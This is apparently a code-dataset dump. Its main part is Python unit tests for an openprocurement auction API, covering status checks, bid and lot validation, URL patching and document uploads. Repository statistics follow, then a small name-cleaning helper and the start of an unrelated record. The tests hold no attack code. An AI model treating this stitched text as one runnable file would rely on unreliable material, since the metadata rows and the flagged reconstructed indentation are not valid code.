                    self.auction_id,
                    self.initial_bids[1]['id'])}]}
    # Lot auctions require the participation URL per lotValue, not per bid.
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [{u'description': [{u'participationUrl': [
        u'url should be posted for each lot of bid']}], u'location': u'body', u'name': u'bids'}])
    del patch_data['bids'][0]["participationUrl"]
    patch_data['bids'][0]['lotValues'] = [
        {
            "participationUrl": u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
                self.auction_id,
                self.initial_bids[0]['id'])}]
    # ...and auctionUrl must likewise be posted per lot.
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [{u'description': [
        "url should be posted for each lot"], u'location': u'body', u'name': u'auctionUrl'}])
    patch_data['lots'] = [
        {
            "auctionUrl": patch_data.pop('auctionUrl')
        }
    ]
    # Still only one bid entry for two bids -> count mismatch.
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Number of auction results did not match the number of auction bids")
    patch_data['bids'].append(
        {'lotValues': [
            {
                "participationUrl":
                    u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
                        self.auction_id,
                        self.initial_bids[0]['id']
                    )
            }
        ]}
    )
    # Malformed, then unknown, then valid bid ids.
    patch_data['bids'][1]['id'] = "some_id"
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], {
        u'id': [u'Hash value is wrong length.']})
    patch_data['bids'][1]['id'] = "00000000000000000000000000000000"
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Auction bids should be identical to the auction bids")
    patch_data['bids'][1]['id'] = self.initial_bids[0]['id']
    # Patching without a lot id succeeds but returns an empty body.
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertIsNone(response.json)
    for lot in self.initial_lots:
        response = self.app.patch_json(
            '/auctions/{}/auction/{}'.format(self.auction_id, lot['id']), {'data': patch_data})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        auction = response.json['data']
    # URLs land on the opposite bids (ids were swapped above).
    self.assertEqual(
        auction["bids"][0]['lotValues'][0]['participationUrl'],
        patch_data["bids"][1]['lotValues'][0]['participationUrl'])
    self.assertEqual(
        auction["bids"][1]['lotValues'][0]['participationUrl'],
        patch_data["bids"][0]['lotValues'][0]['participationUrl'])
    self.assertEqual(
        auction["lots"][0]['auctionUrl'],
        patch_data["lots"][0]['auctionUrl'])
    self.set_status('complete')
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't update auction urls in current (complete) auction status")
def test_post_auction_auction_document(self):
    """Attach and replace auction documents across the auction lifecycle."""
    self.app.authorization = ('Basic', ('auction', ''))
    # Upload is forbidden before the auction starts.
    response = self.app.post(
        '/auctions/{}/documents'.format(
            self.auction_id), upload_files=[
            ('file', 'name.doc', 'content')], status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't add document in current (active.tendering) auction status")
    self.set_status('active.auction')
    response = self.app.post(
        '/auctions/{}/documents'.format(
            self.auction_id), upload_files=[
            ('file', 'name.doc', 'content')])
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    # Download key = last query-string value of the document URL.
    key = response.json["data"]["url"].split('?')[-1].split('=')[-1]
    response = self.app.patch_json(
        '/auctions/{}/documents/{}'.format(
            self.auction_id, doc_id), {
            'data': {
                "documentOf": "lot", 'relatedItem': self.initial_lots[0]['id']}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json["data"]["documentOf"], "lot")
    self.assertEqual(
        response.json["data"]["relatedItem"],
        self.initial_lots[0]['id'])
    # Report results so the auction moves past active.auction.
    patch_data = {
        'bids': [
            {
                "id": self.initial_bids[1]['id'],
                'lotValues': [
                    {
                        "value": {
                            "amount": 409,
                            "currency": "UAH",
                            "valueAddedTaxIncluded": True
                        }
                    }
                ]
            },
            {
                'id': self.initial_bids[0]['id'],
                'lotValues': [
                    {
                        "value": {
                            "amount": 419,
                            "currency": "UAH",
                            "valueAddedTaxIncluded": True
                        }
                    }
                ]
            }
        ]
    }
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    # Replacing the document keeps the id but yields a fresh download key.
    response = self.app.put(
        '/auctions/{}/documents/{}'.format(
            self.auction_id, doc_id), upload_files=[
            ('file', 'name.doc', 'content_with_names')])
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    key2 = response.json["data"]["url"].split('?')[-1].split('=')[-1]
    self.assertNotEqual(key, key2)
    self.set_status('complete')
    response = self.app.post(
        '/auctions/{}/documents'.format(
            self.auction_id), upload_files=[
            ('file', 'name.doc', 'content')], status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't add document in current (complete) auction status")
class AuctionMultipleLotAuctionResourceTest(AuctionAuctionResourceTest):
    """Auction-view endpoint tests for an auction with two lots."""
    # NOTE(review): base is AuctionAuctionResourceTest (the lot-less class),
    # yet the overridden tests below rely on lotValues/initial_lots --
    # confirm the intended base class upstream.
    initial_lots = 2 * test_lots
def test_get_auction_auction(self):
    """GET /auctions/{id}/auction for a two-lot auction across statuses."""
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.get(
        '/auctions/{}/auction'.format(self.auction_id), status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't get auction info in current (active.tendering) auction status")
    self.set_status('active.auction')
    response = self.app.get('/auctions/{}/auction'.format(self.auction_id))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    auction = response.json['data']
    self.assertNotEqual(auction, self.initial_data)
    self.assertIn('dateModified', auction)
    self.assertIn('minimalStep', auction)
    self.assertIn('lots', auction)
    # Participant identities are stripped from the auction-service view.
    self.assertNotIn("procuringEntity", auction)
    self.assertNotIn("tenderers", auction["bids"][0])
    # Amounts are exposed for every lotValue of every bid (two lots here).
    self.assertEqual(
        auction["bids"][0]['lotValues'][0]['value']['amount'],
        self.initial_bids[0]['lotValues'][0]['value']['amount'])
    self.assertEqual(
        auction["bids"][1]['lotValues'][0]['value']['amount'],
        self.initial_bids[1]['lotValues'][0]['value']['amount'])
    self.assertEqual(
        auction["bids"][0]['lotValues'][1]['value']['amount'],
        self.initial_bids[0]['lotValues'][1]['value']['amount'])
    self.assertEqual(
        auction["bids"][1]['lotValues'][1]['value']['amount'],
        self.initial_bids[1]['lotValues'][1]['value']['amount'])
    self.set_status('active.qualification')
    response = self.app.get(
        '/auctions/{}/auction'.format(self.auction_id), status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't get auction info in current (active.qualification) auction status")
def test_post_auction_auction(self):
    """POST auction results for a two-lot auction, covering lot validation."""
    # NOTE(review): indentation reconstructed from flattened dump -- verify
    # block nesting against the upstream file.
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': {}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't report auction results in current (active.tendering) auction status")
    self.set_status('active.auction')
    response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {
        'data': {'bids': [{'invalid_field': 'invalid_value'}]}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [{u'description': {
        u'invalid_field': u'Rogue field'}, u'location': u'body', u'name': u'bids'}])
    patch_data = {
        'bids': [
            {
                "id": self.initial_bids[1]['id'],
                'lotValues': [
                    {
                        "value": {
                            "amount": 419,
                            "currency": "UAH",
                            "valueAddedTaxIncluded": True
                        }
                    }
                ]
            }
        ]
    }
    # One result for two bids -> bid-count mismatch.
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Number of auction results did not match the number of auction bids")
    patch_data['bids'].append({
        'lotValues': [
            {
                "value": {
                    "amount": 409,
                    "currency": "UAH",
                    "valueAddedTaxIncluded": True
                }
            }
        ]
    })
    patch_data['bids'][1]['id'] = "some_id"
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], {
        u'id': [u'Hash value is wrong length.']})
    patch_data['bids'][1]['id'] = "00000000000000000000000000000000"
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Auction bids should be identical to the auction bids")
    # Valid ids, but each bid still carries only one lotValue for two lots.
    patch_data['bids'][1]['id'] = self.initial_bids[0]['id']
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], [{"lotValues": [
        "Number of lots of auction results did not match the number of auction lots"]}])
    # Duplicate the single lotValue for every lot.
    for bid in patch_data['bids']:
        bid['lotValues'] = [bid['lotValues'][0].copy()
                            for i in self.initial_lots]
    # Wrong relatedLot (points at lot 0 from position 1).
    patch_data['bids'][0]['lotValues'][1]['relatedLot'] = self.initial_bids[0]['lotValues'][0]['relatedLot']
    # NOTE(review): this step uses patch_json inside the POST test --
    # present in the original; confirm whether post_json was intended.
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], [{u'lotValues': [
        {u'relatedLot': [u'relatedLot should be one of lots of bid']}]}])
    patch_data['bids'][0]['lotValues'][1]['relatedLot'] = self.initial_bids[0]['lotValues'][1]['relatedLot']
    for lot in self.initial_lots:
        response = self.app.post_json(
            '/auctions/{}/auction/{}'.format(self.auction_id, lot['id']), {'data': patch_data})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        auction = response.json['data']
    self.assertNotEqual(
        auction["bids"][0]['lotValues'][0]['value']['amount'],
        self.initial_bids[0]['lotValues'][0]['value']['amount'])
    self.assertNotEqual(
        auction["bids"][1]['lotValues'][0]['value']['amount'],
        self.initial_bids[1]['lotValues'][0]['value']['amount'])
    # Reported amounts land on the opposite bids (ids were swapped above).
    self.assertEqual(
        auction["bids"][0]['lotValues'][0]['value']['amount'],
        patch_data["bids"][1]['lotValues'][0]['value']['amount'])
    self.assertEqual(
        auction["bids"][1]['lotValues'][0]['value']['amount'],
        patch_data["bids"][0]['lotValues'][0]['value']['amount'])
    self.assertEqual('active.qualification', auction["status"])
    self.assertIn("tenderers", auction["bids"][0])
    self.assertIn("name", auction["bids"][0]["tenderers"][0])
    # self.assertIn(auction["awards"][0]["id"], response.headers['Location'])
    self.assertEqual(
        auction["awards"][0]['bid_id'],
        patch_data["bids"][0]['id'])
    self.assertEqual(
        auction["awards"][0]['value']['amount'],
        patch_data["bids"][0]['lotValues'][0]['value']['amount'])
    self.assertEqual(
        auction["awards"][0]['suppliers'],
        self.initial_bids[0]['tenderers'])
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't report auction results in current (active.qualification) auction status")
def test_patch_auction_auction(self):
    """PATCH auction/participation URLs for a two-lot auction, including
    lot-level validation and a cancelled-lot refusal."""
    # NOTE(review): indentation reconstructed from flattened dump -- verify
    # block nesting against the upstream file.
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': {}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't update auction urls in current (active.tendering) auction status")
    self.set_status('active.auction')
    # NOTE(review): no-op chronograph patch -- presumably forces a status
    # recalculation; confirm intent.
    self.app.authorization = ('Basic', ('chronograph', ''))
    response = self.app.patch_json(
        '/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
    self.assertEqual(response.status, '200 OK')
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.patch_json('/auctions/{}/auction'.format(self.auction_id), {
        'data': {'bids': [{'invalid_field': 'invalid_value'}]}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [{u'description': {
        u'invalid_field': u'Rogue field'}, u'location': u'body', u'name': u'bids'}])
    patch_data = {
        'auctionUrl': u'http://auction-sandbox.openprocurement.org/auctions/{}'.format(
            self.auction_id),
        'bids': [
            {
                "id": self.initial_bids[1]['id'],
                "participationUrl": u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
                    self.auction_id,
                    self.initial_bids[1]['id'])}]}
    # Lot auctions require the participation URL per lotValue, not per bid.
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [{u'description': [{u'participationUrl': [
        u'url should be posted for each lot of bid']}], u'location': u'body', u'name': u'bids'}])
    del patch_data['bids'][0]["participationUrl"]
    patch_data['bids'][0]['lotValues'] = [
        {
            "participationUrl": u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
                self.auction_id,
                self.initial_bids[0]['id'])}]
    # ...and auctionUrl must likewise be posted per lot.
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [{u'description': [
        "url should be posted for each lot"], u'location': u'body', u'name': u'auctionUrl'}])
    patch_data['lots'] = [
        {
            "auctionUrl": patch_data.pop('auctionUrl')
        }
    ]
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Number of auction results did not match the number of auction bids")
    patch_data['bids'].append(
        {
            'lotValues': [
                {
                    "participationUrl":
                        u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
                            self.auction_id,
                            self.initial_bids[0]['id'])}]})
    patch_data['bids'][1]['id'] = "some_id"
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], {
        u'id': [u'Hash value is wrong length.']})
    patch_data['bids'][1]['id'] = "00000000000000000000000000000000"
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Auction bids should be identical to the auction bids")
    # Valid bid ids, but only one lot entry for two lots.
    patch_data['bids'][1]['id'] = self.initial_bids[0]['id']
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        u'Number of lots did not match the number of auction lots')
    patch_data['lots'] = [patch_data['lots'][0].copy()
                          for i in self.initial_lots]
    # Unknown lot id.
    patch_data['lots'][1]['id'] = "00000000000000000000000000000000"
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        u'Auction lots should be identical to the auction lots')
    # Valid lot ids, but each bid still has a single lotValue.
    patch_data['lots'][1]['id'] = self.initial_lots[1]['id']
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], [{"lotValues": [
        "Number of lots of auction results did not match the number of auction lots"]}])
    for bid in patch_data['bids']:
        bid['lotValues'] = [bid['lotValues'][0].copy()
                            for i in self.initial_lots]
    # Wrong relatedLot (points at lot 0 from position 1).
    patch_data['bids'][0]['lotValues'][1]['relatedLot'] = self.initial_bids[0]['lotValues'][0]['relatedLot']
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], [{u'lotValues': [
        {u'relatedLot': [u'relatedLot should be one of lots of bid']}]}])
    patch_data['bids'][0]['lotValues'][1]['relatedLot'] = self.initial_bids[0]['lotValues'][1]['relatedLot']
    # Patching without a lot id succeeds but returns an empty body.
    response = self.app.patch_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertIsNone(response.json)
    for lot in self.initial_lots:
        response = self.app.patch_json(
            '/auctions/{}/auction/{}'.format(self.auction_id, lot['id']), {'data': patch_data}
        )
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        auction = response.json['data']
    # URLs land on the opposite bids (ids were swapped above).
    self.assertEqual(
        auction["bids"][0]['lotValues'][0]['participationUrl'],
        patch_data["bids"][1]['lotValues'][0]['participationUrl'])
    self.assertEqual(
        auction["bids"][1]['lotValues'][0]['participationUrl'],
        patch_data["bids"][0]['lotValues'][0]['participationUrl'])
    self.assertEqual(
        auction["lots"][0]['auctionUrl'],
        patch_data["lots"][0]['auctionUrl'])
    # Cancel the first lot as the broker, then updating its urls must fail.
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.post_json(
        '/auctions/{}/cancellations?acc_token={}'.format(
            self.auction_id, self.auction_token
        ), {'data': {'reason': 'cancellation reason',
                     'status': 'active',
                     'cancellationOf': 'lot',
                     'relatedLot': self.initial_lots[0]['id']}
            }
    )
    self.assertEqual(response.status, '201 Created')
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.patch_json(
        '/auctions/{}/auction/{}'.format(
            self.auction_id, self.initial_lots[0]['id']), {
            'data': patch_data}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can update auction urls only in active lot status")
def test_post_auction_auction_document(self):
    """Exercise document upload/patch/replace on an auction across statuses."""
    docs_url = '/auctions/{}/documents'.format(self.auction_id)
    upload = [('file', 'name.doc', 'content')]
    self.app.authorization = ('Basic', ('auction', ''))
    # Uploading is rejected while the auction is still in tendering.
    response = self.app.post(docs_url, upload_files=upload, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't add document in current (active.tendering) auction status")
    # Once the auction phase starts the upload succeeds.
    self.set_status('active.auction')
    response = self.app.post(docs_url, upload_files=upload)
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    document_id = response.json["data"]['id']
    first_key = response.json["data"]["url"].split('?')[-1].split('=')[-1]
    document_url = '/auctions/{}/documents/{}'.format(self.auction_id, document_id)
    # Re-attach the uploaded document to the first lot.
    response = self.app.patch_json(
        document_url,
        {'data': {"documentOf": "lot", 'relatedItem': self.initial_lots[0]['id']}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json["data"]["documentOf"], "lot")
    self.assertEqual(
        response.json["data"]["relatedItem"], self.initial_lots[0]['id'])
    # Post auction results: one lotValue per lot for each of the two bids.
    patch_data = {
        'bids': [
            {
                "id": self.initial_bids[1]['id'],
                'lotValues': [
                    {"value": {"amount": 409, "currency": "UAH",
                               "valueAddedTaxIncluded": True}}
                    for _lot in self.initial_lots
                ],
            },
            {
                'id': self.initial_bids[0]['id'],
                'lotValues': [
                    {"value": {"amount": 419, "currency": "UAH",
                               "valueAddedTaxIncluded": True}}
                    for _lot in self.initial_lots
                ],
            },
        ]
    }
    response = self.app.post_json(
        '/auctions/{}/auction'.format(self.auction_id), {'data': patch_data})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    # Replacing the file keeps the document id but issues a fresh download key.
    response = self.app.put(
        document_url,
        upload_files=[('file', 'name.doc', 'content_with_names')])
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(document_id, response.json["data"]["id"])
    second_key = response.json["data"]["url"].split('?')[-1].split('=')[-1]
    self.assertNotEqual(first_key, second_key)
    # After completion, uploads are forbidden again.
    self.set_status('complete')
    response = self.app.post(docs_url, upload_files=upload, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(
        response.json['errors'][0]["description"],
        "Can't add document in current (complete) auction status")
class AuctionFeaturesAuctionResourceTest(BaseAuctionWebTest):
    """Auction-view tests for an auction that declares feature parameters."""

    initial_data = test_features_auction_data
    initial_status = 'active.auction'
    # Two bids, each carrying one parameter per declared feature; only the
    # parameter value and the bid amount differ between them.
    initial_bids = [
        {
            "parameters": [
                {"code": feature["code"], "value": parameter_value}
                for feature in test_features_auction_data['features']
            ],
            "tenderers": [test_organization],
            "value": {
                "amount": bid_amount,
                "currency": "UAH",
                "valueAddedTaxIncluded": True,
            },
        }
        for parameter_value, bid_amount in ((0.1, 469), (0.15, 479))
    ]

    test_get_auction_auction = snitch(get_auction_features_auction)
class FlashAuctionBridgePeriodPatchTest(BaseAuctionWebTest):
    """Tests patching the auction period through the bridge endpoints.

    The actual scenarios live in the shared ``set_auction_period`` /
    ``reset_auction_period`` functions; ``snitch`` presumably wraps them as
    test methods on this class — confirm against the test helpers module.
    """
    initial_bids = test_bids
    test_set_auction_period = snitch(set_auction_period)
    test_reset_auction_period = snitch(reset_auction_period)
def suite():
    """Assemble and return the unittest suite for this module's test cases."""
    case_classes = (
        AuctionAuctionResourceTest,
        AuctionSameValueAuctionResourceTest,
        AuctionLotAuctionResourceTest,
        AuctionMultipleLotAuctionResourceTest,
        AuctionFeaturesAuctionResourceTest,
        FlashAuctionBridgePeriodPatchTest,
    )
    tests = unittest.TestSuite()
    for case_class in case_classes:
        tests.addTest(unittest.makeSuite(case_class))
    return tests
# Allow running this module directly; default to the suite() aggregator above.
if __name__ == '__main__':
    unittest.main(defaultTest='suite')
| 44.962129
| 120
| 0.565744
| 4,292
| 43,928
| 5.672647
| 0.042404
| 0.117674
| 0.155871
| 0.053846
| 0.929232
| 0.916335
| 0.907504
| 0.902575
| 0.891486
| 0.889555
| 0
| 0.02275
| 0.281529
| 43,928
| 976
| 121
| 45.008197
| 0.748677
| 0.004439
| 0
| 0.804245
| 0
| 0
| 0.248056
| 0.019781
| 0
| 0
| 0
| 0
| 0.253538
| 1
| 0.010613
| false
| 0
| 0.007075
| 0
| 0.04717
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa363e503b7714da4a917b33df4650be6baf6a00
| 133
|
py
|
Python
|
octmaps/io/__init__.py
|
bisselma/octmaps
|
3b215e787ff9242f702b26d5d933191085e326f8
|
[
"MIT"
] | null | null | null |
octmaps/io/__init__.py
|
bisselma/octmaps
|
3b215e787ff9242f702b26d5d933191085e326f8
|
[
"MIT"
] | null | null | null |
octmaps/io/__init__.py
|
bisselma/octmaps
|
3b215e787ff9242f702b26d5d933191085e326f8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from .vol_map_generator import HeyexVolMapsGenerator
from .xml_map_generator import HeyexXmlMapsGenerator
| 33.25
| 53
| 0.796992
| 15
| 133
| 6.8
| 0.733333
| 0.235294
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 0.120301
| 133
| 3
| 54
| 44.333333
| 0.863248
| 0.157895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d72a8c149f314f256994d0fc767bf218c3e35017
| 255
|
py
|
Python
|
functions/helpers.py
|
nadiahpk/niche-neutral-riau-birds
|
83eeba57973d6912ad354592c84a03b5c24b3363
|
[
"Unlicense"
] | null | null | null |
functions/helpers.py
|
nadiahpk/niche-neutral-riau-birds
|
83eeba57973d6912ad354592c84a03b5c24b3363
|
[
"Unlicense"
] | null | null | null |
functions/helpers.py
|
nadiahpk/niche-neutral-riau-birds
|
83eeba57973d6912ad354592c84a03b5c24b3363
|
[
"Unlicense"
] | null | null | null |
def standardise_name(string):
    """Return a canonical lower-case, underscore-separated form of *string*.

    Colleagues keep changing the data, so this normalises away arbitrary
    upper/lower case, spaces, hyphens, apostrophes and parentheses.

    Parameters
    ----------
    string : str
        Raw name as it appears in the data.

    Returns
    -------
    str
        Lower-cased name with spaces/hyphens turned into underscores and
        apostrophes/parentheses removed.
    """
    # Single C-level pass instead of five chained .replace() calls:
    # ' ' and '-' map to '_'; "'", '(' and ')' are deleted (None).
    translation = str.maketrans({' ': '_', '-': '_', "'": None,
                                 '(': None, ')': None})
    return string.lower().translate(translation)
| 36.428571
| 112
| 0.627451
| 28
| 255
| 5.607143
| 0.785714
| 0.356688
| 0.401274
| 0.356688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152941
| 255
| 6
| 113
| 42.5
| 0.726852
| 0.380392
| 0
| 0
| 0
| 0
| 0.181818
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
d772db0784526b732165024da400ec57e48d68ab
| 81
|
py
|
Python
|
icanhaz/tests/__init__.py
|
carljm/django-icanhaz
|
57939325850058959c1ee8dce13e2b8c28156532
|
[
"BSD-3-Clause"
] | 3
|
2015-11-18T02:04:34.000Z
|
2021-02-21T03:12:46.000Z
|
icanhaz/tests/__init__.py
|
carljm/django-icanhaz
|
57939325850058959c1ee8dce13e2b8c28156532
|
[
